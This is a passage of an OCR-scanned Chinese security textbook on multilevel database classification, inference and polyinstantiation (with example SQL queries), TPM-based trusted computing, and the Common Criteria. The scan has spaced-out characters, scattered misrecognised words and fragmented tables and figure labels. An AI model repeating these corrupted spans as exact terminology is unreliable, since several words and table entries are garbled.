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e 整个 数据 库 : 这 种 简单 方法 很 容易 在 MLS 平台 上 实现 。 整 个 数据 库 (如 财务 或 人 事 数 
EE) 可 以 划分 为 秘密 级 或 内 部 级 ， 在 服务 器 上 与 其 他 文件 一 起 维护 。 

e 单独 表 (关系 ) : 对 某 些 应 用 ， 适 合 在 “ 表 ” 级 分 配 密级 。 在 图 13-9a 的 例子 中 ， 定 义 
了 两 个 密级 : 公开 级 (unrestricted, U) 和 内 部 级 (restricted, R), Employee RAM 
感 的 工资 信息 ， 定 为 内 部 级 ; 而 Department 表 则 定 为 公开 级 。 这 个 级 别 的 粒度 相对 容 
易 实 现 和 执行 。 

e 单独 列 (属性 ) : 安全 管理 员 可 以 选择 根据 属性 确定 密级 ， 从 而 选 定 列 是 涉 密 的 。 在 
图 13-9b 的 例子 中 ， 管 理 员 确 定 工 资信 息 和 部 门 经 理 的 身份 是 内 部 级 信息 。 

o 单独 行 (元 组 ) : 在 其 他 情况 下 ， 基 于 满足 某 些 性 质 的 单独 行 来 分 配 密 级 可 能 是 合理 
的 。 在 图 13-9c 中 ，Department 表 中 所 有 包含 财务 部 (DeptID=4) 有 关 信 息 的 行 和 
Employee 表 中 所 有 Salary 大 于 50K 的 行 都 是 内 部 级 的 。 

e 单独 元 素 : 最 难于 实现 与 管理 的 方案 是 单独 元 素 可 以 选择 密级 的 方案 。 在 图 13-9d 中 ， 
(人 力 资源 部 的 ) 工资 信息 和 财务 部 的 经 理 身份 是 内 部 级 的 。 

密级 方案 的 粒度 影响 了 访问 控制 实施 的 方式 。 特 别 地 ， 预 防 推理 的 工作 量 取 决 于 密级 

粒度 。 

ED ”对 于 读 访问 ， 数 据 库 系统 需要 执行 简单 安全 原则 (不 上 读 )。 如 果 密 级 粒度 是 整 

个 数据 库 级 或 表 级 ， 这 是 很 直接 的 。 现 在 考虑 一 个 按 列 (属性 ) 划分 密级 的 数据 库 。 例 如 ， 在 
图 13-9b 中 ,假设 只 具有 公开 级 许可 的 用 户 发 出 下 面 SQL 查询 : 
SELECT Ename 


FROM Employee 
WHERE Salary > 50K 


该 查询 仅 返 回 公 开 级 数据 但 暴露 了 内 部 级 信息 ， 即 是 否 存 在 任何 职工 的 工资 大 于 50K， 如 
果 存 在 ， 是 哪些 职工 。 处 理 这 种 类 型 的 安全 违例 不 仅 要 考虑 返回 给 用 户 的 数据 ， 还 要 考虑 任何 
必须 被 访问 以 满足 该 查询 的 数据 。 这 个 例子 中 的 查询 请 求 对 Salary 属性 的 访问 ， 这 对 该 用 户 是 
非 授 权 的 ， 因 而 查询 被 拒绝 。 

如 果 划 分 密级 按 行 (元 组 ) 而 非 按 列 ， 上 面 的 查询 并 不 会 引起 推理 问题 。 图 13-9c 显示 
Employee 表 中 所 有 对 应 于 工资 大 于 50K 的 行 都 是 内 部 级 的 。 因 为 所 有 这 样 的 记录 都 会 从 前 面 
查询 的 结果 中 除去 ， 所 以 刚刚 讨论 的 推理 问题 并 不 会 发 生 。 然 而 ， 可 以 推理 出 一 些 信息 。 因 为 
结果 为 空 表 明 ， 要 么 大 于 50K 的 工资 是 内 部 级 的 ， 要么 没有 职工 的 工资 大 于 50K. 

采用 按 行 划 分 密级 而 非 按 列 划分 还 会 产生 其 他 推理 问题 。 例 如 ， 假 设 我 们 在 图 13-9c 的 数 
据 库 中 添加 新 的 Projects 表 。 该 表 由 Eid, ProjectID 和 ProjectName 属性 组 成 ， 其 中 Employee 
表 与 Projects 表 中 的 Eid 字段 可 以 连接 。 假 设 Projects 表 中 除了 ProjectID 是 500 到 599 的 项 目 
之 外 的 所 有 记录 都 是 公开 级 的 。 考 虑 下 面 的 请 求 : 

SELECT Ename 


WHERE Employee.Eid = Projects.Eid 
AND Projects.ProjectID = 500 


如 果 该 请 求 被 授权 ， 它 将 返回 Employee 表 中 的 公开 级 信息 ， 尽 管 它 会 暴露 内 部 级 信息 ， 
即 选 出 的 职工 是 分 配 到 项 目 500 的 职工 。 同 以 前 一 样 ， 数 据 库 系统 必须 不 仅 要 考虑 返回 给 用 户 
的 数据 ， 还 要 考虑 任何 满足 该 查询 而 必须 要 访问 的 数据 。 

按 元 素 划分 密级 并 不 会 引入 任何 新 的 需要 考虑 的 问题 。 系 统 必 须 不 仅 要 阻止 向 上 读 ， 还 要 
阻止 为 了 满足 查询 而 必须 访问 更 高 级 元 素 的 查询 。 

总 的 来 说 ， 我 们 认为 如 果 密 级 粒度 是 数据 库 或 表 ， 处 理 读 访问 是 相当 简单 的 。 如 果 整 个 数 
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据 库 具 有 单一 密级 ， 那 么 没有 新 的 推理 问题 产生 。 按 表 划 分 密级 也 是 如 此 。 如 果 想 要 某 个 更 细 
粒度 的 密级 ， 那 可 能 会 通过 拆 分 表 来 达到 相同 的 效果 。 

写 访问 ”对 于 写 访 问 ， 数 据 库 系 统 需要 执行 *- 安全 规则 (不 下 写 )。 但 这 并 不 像 看 起 来 那 
么 简单 。 考 虑 下 面 的 情况 。 假 设 密级 划分 粒度 比 表 级 还 细 《〈 即 按 列 、 按 行 或 按 元 素 )， 且 具有 
低 许可 (公开 级 ) 的 用 户 请 求 插 入 一 行 ， 该 行 的 主键 与 已 有 的 本 身 或 其 一 个 元 素 处 于 更 高 密级 
的 行 的 主键 相同 。DBMS 本 质 上 有 三 种 选择 : 

1. 通知 用 户 具 有 相同 主键 的 行 已 存在 ， 拒 绝 插 入 。 这 并 不 合乎 要 求 ， 因 为 这 使 得 用 户 知道 
存在 具有 指定 主键 值 的 更 高 密级 的 行 。 

2. 用 具有 低 密级 的 新 行 替 换 已 有 行 。 这 也 不 合乎 要 求 ， 因 为 这 将 允许 用 户 改 写 对 其 不 可 见 
的 数据 ， 从 而 破坏 了 数据 完整 性 。 

3. 插 入 具有 低 密级 的 新 行 而 不 修改 具有 高 密级 的 已 有 行 。 这 被 称 为 多 实例 (polyins- 
tantiation)。 这 避免 了 推理 和 数据 完整 性 问题 但 产生 了 具有 冲突 项 的 数据 库 。 

当 用 户 试图 更 新 行 而 非 插 入 行 时 ， 可 以 运用 同样 的 备 选 方案 。 为 了 说 明 多 实例 的 影响 ， 考 
虑 下 面 一 个 具有 低 许可 (U) 的 用 户 应 用 到 图 13-9c 的 查询 。 


INSERT INTO Employee 
VALUES (James,8,35K,9664,U) 


表 中 已 有 一 行 对 应 工资 水 平 更 高 的 James， 这 使 得 必须 将 该 行 定 为 内 部 级 。 新 元 组 将 具有 
公开 密级 。 下 面 的 更 新 将 产生 同样 的 效果 : 
UPDATE Employee 


SET Salary=35K 
WHERE Eid=9664 


该 结果 将 引起 混乱 ( 见 图 13-10 )。 显 然 ，James 只 能 
有 一 个 工资 ， 因 此 两 行 中 的 一 行 是 假 值 。 这 样 做 的 动机 是 
防止 推理 。 因 为 如 果 公 开 级 用 户 查 询 原始 数据 库 且 其 请 求 
被 拒绝 ， 用 户 就 可 以 推理 出 工资 大 于 50K。“ 假 ” 行 的 包含 
对 James 的 真实 工资 提供 了 一 种 形式 的 覆盖 。 尽 管 这 种 方法 
看 起 来 不 太 令 人 满意 ， 但 已 经 有 大 量 多 实例 的 设计 与 实现 
[BERT95] 存在 了 。 2 

可 以 采用 数据 库 级 或 表 级 的 密级 粒度 来 避免 这 个 问题 。 13-10 gawe 
在 很 多 应 用 中 ， 这 样 的 粒度 就 能 完全 满足 要 求 。 


13.5 ”可 信 计 算 与 可 信和 平台 模块 

可 信 平 台 模 块 (Trusted Platform Module, TPM) 是 一 人 
( Trusted Computing Group) 标准 化 的 概念 。TPM 是 处 于 实现 可 信 计 算 的 硬件 / 软件 方法 的 心脏 
部 位 的 硬件 模块 。 实 际 上 ， 现 在 应 用 于 工业 中 的 术语 可 信 计 算 (Trusted Computing, TC) 是 指 
这 种 硬件 / 软件 方法 。 

TC 方法 在 个 人 计算 机 主板 或 智能 卡 上 部 署 一 个 TPM 芯片 ， 或 将 其 集成 到 主 处 理 器 中 ， 
再 加 上 在 某 种 意义 上 获准 或 经 认证 与 TPM 一 起 工作 的 硬件 和 软件 。 我 们 可 以 简要 描述 TC 方 
法 如 下 : TPM 生成 由 在 系统 中 传输 数据 的 脆弱 部 件 (如 存储 设备 、 存 储 器 部 件 和 音频 /视频 
硬件 ) 共享 的 密 钥 。 密 钥 可 以 用 来 加 密 在 机 器 中 流动 的 数据 。TPM 还 与 TC 可 用 软件 (包括 
OS 和 应 用 ) 一 起 工作 。 软 件 可 以 确保 接收 的 数据 是 可 信赖 的 ， 系统 可 以 确保 软件 本 身 是 可 信 
赖 的 。 
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为 了 实现 这 些 特征 ，TC 提供 了 三 个 基本 服务 : 鉴别 引导 (authenticated boot), Wie 
(certification) 和 加 密 (encryption). 


13.5.1 鉴别 引导 服务 


鉴别 引导 服务 负责 分 阶段 地 引导 整个 操作 系统 ， 确 保 操 作 系统 的 每 个 部 分 在 其 加 载 时 是 获 

准 使 用 的 版 本 。 一 般 来 说 ，OS 用 引导 ROM 中 的 一 小 段 代 码 开始 引导 。 这 段 代 码 引 来 硬盘 引 
导 块 中 的 更 多 代码 ， 转 而 执行 这 些 代 码 。 这 个 过 程 持 续 ， 使 得 更 多 更 大 的 OS 代码 块 被 引进 ， 
一 直到 整个 OS 引导 过 程 完 成 ， 驻 留 OS 被 引导 。TC 硬件 在 每 个 阶段 检验 引进 的 软件 是 否 有 效 。 
这 可 以 通过 验证 与 软件 关联 的 数字 签名 来 完成 。TPM 保存 加 载 进 程 的 自 改 证 据 (tamper-evident) 
日 志 ， 用 加 密 散 列 函数 检测 任何 对 日 志 的 自 改 。 
” ”” 当 该 过 程 完成 ， 算 改 证 据 日 志 包 含 能 确切 证 实 哪个 版 本 的 OS 及 其 模块 正在 运行 的 记录 。 
现在 可 以 将 信任 边界 扩展 到 包括 另外 的 硬件 及 应 用 和 实用 软件 。TC 可 用 (TC-enabled) 系统 维 
护 硬件 和 软件 组 件 的 获准 列表 。 为 了 配置 一 部 分 硬件 或 加 载 一 部 分 软件 ， 系 统 检 查 该 组 件 是 否 
在 获准 列表 中 ，( 在 数字 签名 适用 的 地 方 ) 是 否 是 数字 签名 的 ， 它 的 序列 号 是 否 已 被 撤销 。 结 
果 是 配置 了 处 于 明确 定义 状态 、 具 有 获准 组 件 的 硬件 、 系 统 软 件 和 应 用 。 


13.5.2 ”认证 服务 


一 旦 完成 配置 并 由 TPM 记 人 日 志 ，TPM 就 可 以 认证 其 他 方 的 配置 。TPM 可 以 通过 用 其 
私 钥 签 署 配置 信息 的 格式 化 描述 来 产生 数字 证 书 。 因 而 ， 另 一 个 用 户 〈 本 地 用 户 或 者 远程 系统 ) 
可 以 信任 未 更 改 配置 正在 使 用 ， 因 为 : l 

1.TPM 被 认为 是 可 信赖 的 。 我 们 不 需要 对 TPM 本 身 进一步 认证 。 

2. 仅 有 TPM 拥有 其 本 身 的 私 钥 。 接 收 方 可 以 用 TPM 的 公 钥 验证 签名 CULE 2-7b)。 

为 了 确保 配置 是 最 新 的 ， 请 求 者 在 请 求 来 自 TPM 的 签名 证 书 时 以 随机 数 的 形式 发 出 “ 询 
问 (challenge) o TPM 签名 的 数据 块 包括 配置 信息 和 附加 的 随机 数 。 请 求 者 因此 可 以 验证 证 书 
是 否 既 有 效 又 最 新 。 

TC 方案 提供 了 认证 的 层次 方法 。TPM 认证 硬件 /OS 配置 。 然 后 OS 认证 应 用 程序 的 存在 
和 配置 。 如 果 用 户 信任 TPM 并 信任 OS 的 认证 版 本 ， 他 就 可 以 相信 应 用 的 配置 。 


13.5.3 ”加 密 服务 


加 密 服务 使 得 用 这 种 方式 加 密 的 数据 仅 能 由 某 台 机 器 在 某 种 配置 下 可 以 解密 。 这 个 服务 有 
几 个 方面 。 

首先 ，TPM 维护 这 人 台 机 器 唯一 的 主 秘密 密 钥 。 根 据 这 个 密 钥 ，TPM 生成 该 机 器 的 每 种 可 
能 配置 的 秘密 加 密 密 钥 。 如 果 数 据 在 机 器 处 于 某 种 配置 的 情况 下 加 密 ， 那 该 数据 仅 能 使 用 相 
同 的 配置 解密 。 如 果 在 机 器 上 创建 不 同 的 配置 ， 那 么 新 配置 不 能 解密 那些 用 不 同 配置 加 密 的 
数据 。 

该 方案 可 以 同 认 证 一 样 向 上 扩展 。 因 而 ， 可 以 为 应 用 提供 加 密 密 钥 ， 以 便 应 用 能 加 密 数 
据 ， 而 解密 只 能 由 运行 在 期 望 OS 的 期 望 版 本 上 的 期 望 应 用 的 期 望 版 本 完成 。 这 些 加 密 数 据 可 
以 保存 在 本 地 ， 仅 由 保存 数据 的 应 用 获取 ; 或 者 传输 到 远程 主机 的 对 等 应 用 。 对 等 应 用 必须 具 
有 相同 配置 以 解密 数据 。 


13.5.4 TPM 功能 
图 13-11 基于 最 近 的 TPM 规范 ， 是 TPM 功能 组 件 的 框图 。 这 些 组 件 如 下 : 
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© 1/0: 所 有 命令 通过 VO 部 件 进出 。LO 提供 了 与 其 他 TPM 组 件 的 通信 。 

o 加 密 协 处 理 器 (cryptographic coproce- ,~ rn = 
ssor): 包括 为 加 密 及 相关 处 理 特制 的 处 7 
理 器 。 该 组 件 实现 的 具体 加 密 算法 包括 | 
RSA 加密 /解密 、 基 于 RSA 的 数字 签 
名 和 对 称 加 密 。 o 

© 密 钥 生成 器 (key generation): 产生 |d] 
RSA 公 钥 / 私 钥 对 和 对 称 密 钥 。 | 
HMAC 引擎 (HMAC engine): 该 算法 | 

在 各 种 认证 协议 中 使 用 。 é 

随机 数 生成 器 ( Random Number Generator, 

RNG): 该 组 件 产生 各 种 加 密 算法 使 用 图 

的 随机 数 ， 包 括 密 钥 生成 、 数 字 签 名 | 

中 的 随机 值 和 不 重 性 ( nonce)。 不 重 性 | 

指 在 询问 协议 中 一 个 随机 数 只 用 一 次 。 | 

RNG 使 用 硬件 产生 的 随机 数 (制造 商 \ 

指定 )， 并 不 依赖 于 产生 伪 随 机 数 的 软 

件 算法 。 

© SHA-1 引擎 (SHA-1 engine): 该 组 件 实现 了 用 在 数字 签名 和 HMAC 算法 中 的 SHA 

算法 。 

电源 检测 (power detection): 管理 与 平台 电源 状态 相 结合 的 TPM 电源 状态 。 

可 选 配置 (opt-in): 提供 允许 客户 / 用 户 决定 是 否 启 用 TPM 的 安全 机 制 。 

执行 引擎 (execution engine): 运行 程序 代码 ， 执 行 接收 自 IO 端口 的 TPM 命令 。 

非 易 失 性 存储 器 (nonvolatile memory): 用 来 存储 该 TPM 的 永久 身份 和 状态 参数 。 

易 失 性 存储 器 ( volatile memory): 临时 存储 执行 函数 及 可 变 参 数 如 当前 TPM 状态 、 加 

密 密 钥 和 会 话 信息 。 


13.5.5 ”保护 存储 


为 了 给 出 对 TC/TPM 系统 运行 的 一 些 感 知 ， 我 们 来 看 看 保护 存储 功能 。TPM 生成 并 保存 
信任 层次 中 的 许多 加 密 密 钥 。 在 层次 结构 的 根 是 由 TPM 生成 并 仅 能 由 TPM 访问 的 存储 根 密 
钥 。 其 他 密 钥 由 这 个 密 钥 生成 ， 并 由 离 层次 结构 的 根 更 近 的 密 钥 加 密 而 得 以 保护 。 

可 信 平 台 的 一 个 重要 特征 是 TPM 保护 对 象 可 以 被 “密封 〈seal)” 成 平台 的 某 个 软件 状态 。 
24 TPM 保护 对 象 被 创建 时 ， 其 创建 者 标 出 如 果 秘 密 被 泄漏 的 话 必须 处 于 的 软件 状态 。 当 TPM 
拆 封 TPM 保护 对 象 (在 TPM 内 部 ， 不 被 外 界 所 见 ) 时 ，TPM 检验 当前 软件 状态 是 否 符合 标 出 
的 软件 状态 。 如 果 符 合 ，TPM 允许 访问 秘密 ; 如 果 不 符合 ， 则 拒绝 访问 。 

图 13-12 提供 了 这 种 保护 的 一 个 例子 。 在 这 个 例子 中 ,一 个 用 户 应 用 希望 访问 本 地 存储 中 
的 一 个 加 密 文件 。 为 此 将 出 现下 述 步骤 : 

1. 用 来 加 密 文件 的 对 称 密 钥 与 文件 保存 在 一 起 。 密 钥 本 身 用 TPM 能 访问 的 另 一 个 密 钥 加 
密 。 将 受 保护 密 钥 提交 给 TPM 并 请 求 将 其 告诉 该 应 用 。 

2. 与 受 保护 密 钥 关联 的 是 可 以 访问 该 密 钥 的 硬件 / 软件 配置 清单 。TPM 验证 当前 配置 与 揭 
开 密 钥 所 需 的 配置 是 否 相 符 。 此 外 ， 提 出 请 求 的 应 用 必须 被 特别 授权 才能 访问 密 钥 。TPM 使 
用 授权 协议 来 验证 授权 。 
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3. 如 果 当 前 配置 被 允许 访问 受 保护 密 钥 ，TPM 就 解密 该 密 钥 并 将 其 交 给 应 用 。 
4. 应 用 使 用 该 密 钥 解 密 文件 。 应 用 被 信任 ， 可 以 安全 地 丢弃 密 钥 。 


ex 解密 文件 
户 应 用 


用 
aan ED 


3. 密 钥 释 放 





1. 加 载 加密 密 钥 
图 13-12 使 用 受 保护 密 钥 解密 文件 


加 密 文件 采用 类 似 的 方法 。 在 后 一 种 情况 下 ， 进 程 请 求 对 称 密 钥 来 加 密 文件 。TPM 然后 
提供 密 钥 的 加 密 版 本 ， 与 文件 保存 在 一 起 。 


13.6 ”信息 技术 安全 评价 通用 准则 

美国 国家 安全 局 ( National Security Agency) 和 其 他 美国 政府 机 构 开 展 了 开发 可 信 系 统 要 
求 及 评价 准则 的 工作 ， 并 在 20 世纪 80 年 代 初 发 布 了 《可 信 计 算 机 系统 评价 准则 》( Trusted 
Computer System Evaluation Criteria, TCSEC), K “#8845 (Orange Book)”。 其 主要 关注 
保护 信息 保密 性 。 随 后 ， 其 他 国家 着 手 开发 基于 TCSEC 但 更 灵活 、 更 适应 于 IT 发 展 本 质 的 
准则 。 这 些 不 同 工 作 经 过 合并 、 扩 展 与 联合 ， 最 终 促使 在 20 世纪 90 年 代 末 开发 出 通用 准则 。 
《信息 技术 安全 评价 通用 准则 》( Common Criteria (CC) for Information Technology and Security 
Evaluation) 是 规定 安全 要 求 并 定义 评价 准则 的 ISO 标准 。 这 些 标准 旨 在 通过 在 开发 、 评 价 和 
运行 开 产 品 的 过 程 中 采取 形式 化 动作 来 对 这 些 产品 的 安全 性 提供 更 多 的 信任 。 在 开发 阶段 ， 
CC 定义 了 多 个 已 知 有 效 性 的 IT 要 求 ， 用 来 建立 预期 产品 和 系统 的 安全 要 求 。 接 着 ，CC 详 述 
了 如 何 根据 这 些 已 知 要 求 来 评价 具体 产品 ， 以 适当 的 信任 级 别 确认 其 确实 满足 这 些 要求 。 最 
后 ， 不 断 发 展 的 IT 环境 在 运行 当中 可 能 会 暴露 出 新 的 脆弱 性 或 问题 。CC 详 述 了 响应 这 种 变化 
或 许 重新 评价 产品 的 过 程 。 经 过 成 功 的 评价 ， 一 种 特定 的 产品 可 以 被 适当 的 政府 机 构 (如 美国 
的 NIST/NSA) 列 为 CC 认证 的 。 该 机 构 发 行 已 评价 产品 列表 ， 由 需要 使 用 这 些 产品 的 政府 和 
行业 购买 者 使 用 。 


13.6.1 要求 


CC 定义 了 在 评价 中 使 用 的 潜在 安全 要 求 的 公共 集合 。 术 语 评价 对 象 (target of evaluation, 
TOE) 指 接受 评价 的 产品 或 系统 的 那个 部 分 。 要 求 分 为 两 类 : 
© 功能 要 求 functional requirement): 定义 所 需 的 安全 行为 。CC 文件 建立 了 一 组 安全 功 
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能 组 件 用 来 提供 表示 TOE 安全 功能 要 求 的 标准 方法 。 


© 保障 要 求 (assurance requirement): 用 来 保证 宣称 的 安全 措施 有 效 且 正确 实施 的 基础 。 


CC 文件 建立 了 一 组 保障 组 件 用 来 提供 表示 TOE 保障 要 求 的 标准 方法 。 


功能 要 求 和 保障 要 求 都 分 类 来 组 织 : 


的 最 小 可 选 安全 要 求 集 。 


类 
审计 
密码 支持 
通信 
用 户 数 据 保护 
标识 和 鉴别 
安全 管理 
隐私 


TOE 安全 功能 
保护 


资源 利用 
TOE 访问 
可 信 路 径 /通道 


类 
配置 管理 


交付 和 运行 


开发 
指导 性 文档 


生命 周期 支持 
测试 


脆弱 性 评定 


保障 维护 


表 13-3 CC 安全 功能 要 求 


Ho g 


包括 识别 、 记 录 、 存 储 和 分 析 那 些 与 安全 活动 有 关 的 信息 。 这 些 活动 产生 审计 记录 并 检查 这 些 
记录 以 确定 它们 的 安全 相关 性 


当 TOE 实现 密码 功能 时 使 用 。 例 如 ， 可 以 用 来 支持 通信 、 标 识 与 鉴别 、 数 据 分 离 

提供 与 数据 的 发 起 者 和 接受 者 的 不 可 抵赖 有 关 的 两 个 族 
| 
的 要 

确保 授权 用 户 的 无 歧义 标识 以 及 安全 属性 与 用 户 和 主体 的 正确 关联 

规定 安全 属性 、 数 据 和 功能 的 管理 

为 用 户 提 供 其 身份 不 被 其 他 用 户 发 现 和 滥用 的 保护 


着 重 保护 TSF ( TOE security function, TOE 安全 功能 ) 数据 而 不 是 用 户 数据 。 该 类 与 TSF 的 机 
制 与 数据 的 完整 性 和 管理 相关 


支持 所 需 资源 的 处 理 能 力 或 存储 能 力 等 ， 包 括 对 于 容错 、 服 务 优先 级 和 资源 分 配 的 要 求 


规定 用 以 控制 建立 用 户 会 话 的 (除了 规定 标识 和 鉴别 之 外 的 ) 功能 要 求 。TOE 访问 要 求 控制 诸 
如 限制 用 户 会 话 的 数量 和 范围 、 显 示 访 问 历史 、 修 改 访问 参数 等 


关于 用 户 和 TSF 之 间 以 及 两 个 TSF 之 间 的 可 信和 通信 路 径 


表 13-4 CC 安全 保障 要 求 


描 g 
要 求 TOE 的 完整 性 被 充分 保持 。 配 置 管理 明确 提供 了 用 于 评价 的 TOE 和 文档 确 是 准备 交付 的 
TOE 和 文档 的 可 信和 性 
关于 安全 交付 、 安 装 、 运 行 TOE 的 措施 、 程 序 和 标准 的 要 求 ， 以 确保 TOE 提供 的 安全 保护 在 
这 些 事件 过 程 中 不 会 被 前 弱 
关于 TSF 从 ST 中 定义 的 规范 到 实现 的 逐步 细 化 ， 以 及 从 安全 要 求 到 最 低级 表示 的 映射 
关于 用 户 和 管理 员 对 TOE 的 安全 运行 


关于 TOE 的 生命 周期 ， 包 括 生 命 周期 定义 、 工 具 和 技术 、 开 发 环境 安全 和 纠正 TOE 消费 者 发 
现 的 缺陷 


论证 TOE 满足 其 功能 要 求 。 其 族 分 析 了 开发 者 测试 点 覆盖 范围 和 深度 及 独立 性 测试 的 要 求 


定义 了 有 关 标 识 可 利用 的 脆弱 性 的 指导 性 要 求 ， 这 些 脆弱 性 可 能 在 构造 、 运 行 、 误 用 或 错误 配 
E TOE 时 引入 。 这 里 标识 的 族 是 关于 通过 隐蔽 通道 分 析 标 识 脆 弱 性 、 分 析 TOE 配置 、 检 查 安全 
功能 机 制 强度 和 标识 TOE 开发 过 程 中 引信 的 缺陷 的 。 第 二 个 族 是 关于 TOE 组 件 的 安全 分 类 。 第 
三 个 和 第 四 个 族 是 关于 分 析 安 全 影响 变化 和 提供 程序 正 按 规定 执行 的 证 据 。 该 类 提供 了 建立 保障 
维护 机 制 的 构件 块 


提供 欲 在 TOE 经 CC 认证 之 后 运用 的 要 求 。 这 些 要 求 旨 在 确保 当 TOE 或 其 环境 发 生 改 变 时 ， 
TOE 可 以 继续 满足 它 的 安全 目标 


类 (class) 是 具有 共同 关注 点 或 意图 的 要 求 的 集合 。 
表 13-3 和 表 13-4 简要 定义 了 功能 要 求 和 保障 要 求 类 。 这 些 类 中 的 每 一 类 都 包含 许多 族 。 每 个 
族 (family) 的 要 求 具 有 共同 安全 目标 ， 但 在 侧重 点 或 严格 性 上 有 所 区 别 。 例 如 ， 审 计 类 包括 6 
个 族 ， 分 别处 理 审计 的 不 同方 面 ( 如 审计 数据 产生 、 审 计 分 析 和 审计 事件 存储 )。 每 个 族 也 包 
括 一 个 或 多 个 组 件 。 组 件 〈component) 描述 一 组 特定 的 安全 要 求 ， 是 在 CC 定义 结构 中 所 包含 
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例如 ， 功 能 要 求 的 密码 支持 类 包括 两 个 族 : 密码 密 钥 管理 和 密码 运算 。 在 密码 密 钥 管理 
族 中 有 4 个 组 件 ， 分 别 用 来 指定 密 钥 生成 算法 和 密 钥 长 度 、 密 钥 分 配方 法 、 密 钥 访 问 方 法 和 密 
钥 销 毁 方 法 。 对 每 个 组 件 ， 都 有 一 个 可 以 参考 的 标准 用 来 定义 要 求 。 在 密码 运算 族 中 有 一 个 组 
件 ， 用 来 基于 指定 标准 指定 算法 和 密 钥 长 度 。 

功能 和 保障 组 件 的 集合 可 以 组 合 为 可 重用 的 包 ( package)， 这 对 满足 特定 目标 非常 有 效 。 
这 样 的 包 的 实例 可 以 是 自主 访问 控制 所 要 求 的 功能 组 件 。 


13.6.2 ”轮廓 和 目标 


CC 还 定义 了 两 种 可 以 用 CC 定义 的 要 求生 成 的 文档 。 

o 保护 轮廓 (Protection Profile, PP): 定义 了 一 组 与 实现 无 关 、 满 足 消费 者 对 IT 安全 的 
相似 需求 的 要 求 和 目的 。PP 可 重复 使 用 ， 还 可 用 来 定义 那些 公认 有 用 、 对 满足 特定 安 

ka 全 目的 有 效 的 要 求 。 开 发 PP 概念 是 为 了 支持 定义 功能 标准 ， 从 而 为 规划 购买 规范 提供 
472 帮助 。PP 反映 了 用 户 的 安全 需求 。 

e 安全 目标 (Security Target, ST): 包括 特定 TOE 的 IT 安全 目的 和 要 求 ， 定 义 了 该 TOE 
提供 的 功能 和 保障 措施 ， 以 满足 所 述 的 要 求 。ST 可 以 宣称 符合 一 个 或 多 个 PP 的 要 求 ， 
形成 评价 的 基础 。ST 由 销售 者 或 开发 者 提供 。 

13-13 说 明了 作为 一 方 的 要 求 与 作为 另 一 方 的 轮廓 与 目标 之 间 的 关系 。 对 一 个 PP,， 用 

户 可 以 选择 许多 组 件 来 定义 期 望 产 品 的 要 求 。 用 户 还 可 以 参考 预定 义 包 ， 这 些 包 组 合 了 许多 通 
常 在 产品 需求 文档 中 分 类 出 现 的 要 求 。 类 似 地 ， 销 售 者 和 设计 者 可 以 选择 很 多 组 件 和 包 来 定义 
一 个 ST。 






保护 轮廓 
可 能 的 PP 输入 源 


安全 目标 
可 能 的 ST 输 入 源 


` 


图 13-13 通用 准则 要 求 的 组 织 和 结构 


图 13-14 的 内 容 在 CC 文档 中 称 为 安全 功能 要 求 范例 。 实 质 上 ， 这 张 图 基于 基准 监视 器 概 
念 ， 但 又 利用 了 CC 中 的 术语 和 设计 哲学 。 


13.6.3 ”保护 轮廓 实例 


智能 卡 安全 用 户 组 (Smart Card Security User Group) 开发 的 智能 卡 保护 轮廓 提供 了 PP 的 
一 个 简单 实例 。 该 PP 描述 的 智能 卡 的 IT 安全 要 求 用 在 连接 敏感 应 用 如 银行 业 金 融 支 付 系统 的 
情况 下 。 该 PP 的 保障 级 是 EAL 4 (将 在 下 一 小 节 介 绍 )。PP 列 出 了 必须 由 宣称 符合 该 PP 的 产 
品 来 处 理 的 威胁 (threat)。 威 胁 包 括 下 面 这 些 : 
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评价 对 象 (TOE ) TOE 安 全 功能 接口 (TSFI ) 


TOE 安 全 功能 
(TSF) 
执行 TOE 安 全 策略 
(TSP) 





图 13-14 ”安全 功能 要 求 范例 


o 物理 探查 ( physical probing): 可 以 通过 通常 在 IC 失效 分 析 和 IC 逆向 工程 中 采用 的 技 
术 来 实现 读 取 TOE 的 数据 。 
© 无 效 输入 (invalid input): 无 效 输入 可 以 采取 格式 不 正确 的 运算 、 请 求 超过 寄存 器 限制 
的 信息 、 试 图 找到 并 执行 非 文档 化 命令 等 形式 。 这 种 攻击 的 结果 可 能 削弱 安全 功能 ， 
产生 运行 时 可 利用 的 差错 或 者 释放 受 保 护 数据 。 
o 连接 多 次 运行 (linkage of multiple operation): 攻击 者 可 以 观察 资源 或 服务 的 多 次 使 用 ， 
并 通过 连接 这 些 观 察 值 来 推导 出 可 能 泄露 安全 功能 数据 的 信息 。 
在 威胁 列表 之 后 ，PP 给 出 安全 目的 (security objective) 的 描述 。 这 反映 了 所 陈述 的 对 抗 
特定 威胁 或 符合 任何 特定 的 组 织 安全 策略 的 意图 。 列 出 19 个 目的 ， 其 中 包括 下 面 几 个 ; 
o Wit (audit): 系统 必须 提供 记录 选 定 的 安全 相关 事件 的 方法 ， 如 帮助 管理 员 检 测 潜在 
攻击 或 将 使 系统 易 受 攻击 的 系统 安全 特征 的 错误 配置 。 
e 故障 插入 (fault insertion): 系统 必须 通过 插入 错误 数据 来 抵抗 重复 探查 。 
e 信息 泄漏 (information leakage): 系统 必须 规定 控制 和 限制 系统 中 信息 泄漏 的 方法 ， 以 
便 没 有 有 用 信息 通过 电源 、 接 地 、 时 钟 、 复 位 或 IO 等 线 泄露 出 去 。 
安全 要 求 用 来 阻止 特定 威胁 并 支持 特定 前 提 下 的 特定 策略 。PP 列 出 了 三 个 一 般 领 域 的 具 
KER: TOE 安全 功能 要 求 、TOE 安全 保障 要 求 和 IT 环境 的 安全 要 求 。 在 安全 功能 要 求 领域 ， 
PP 从 安全 功能 要 求 ( 表 13-3) 的 可 用 类 中 定义 了 42 个 要 求 。 例 如 ， 对 于 安全 审计 ，PP 规定 
了 系统 必须 审计 什么 ， 必 须 在 日 志 中 记录 什么 信息 ， 监 视 、 操 作 和 保护 日 志 的 规则 是 什么 ， 等 
等 。 功 能 要 求 还 列 出 了 与 智能 卡 运行 中 具体 细节 有 关 的 其 他 功能 要 求 类 。 
PP 从 安全 保障 要 求 ( 见 图 13-4 ) 的 可 用 类 中 定义 了 24 个 安全 保障 要 求 。 下 面 选 出 其 中 一 
些 要求 加 以 说 明 : 
e 产品 设计 和 配置 的 质量 。 
e 在 产品 设计 和 实现 过 程 中 提供 足够 保护 。 
e 产品 的 销售 方 测试 满足 特定 参数 。 
e 产品 交付 过 程 中 安全 功能 性 不 会 削弱 。 
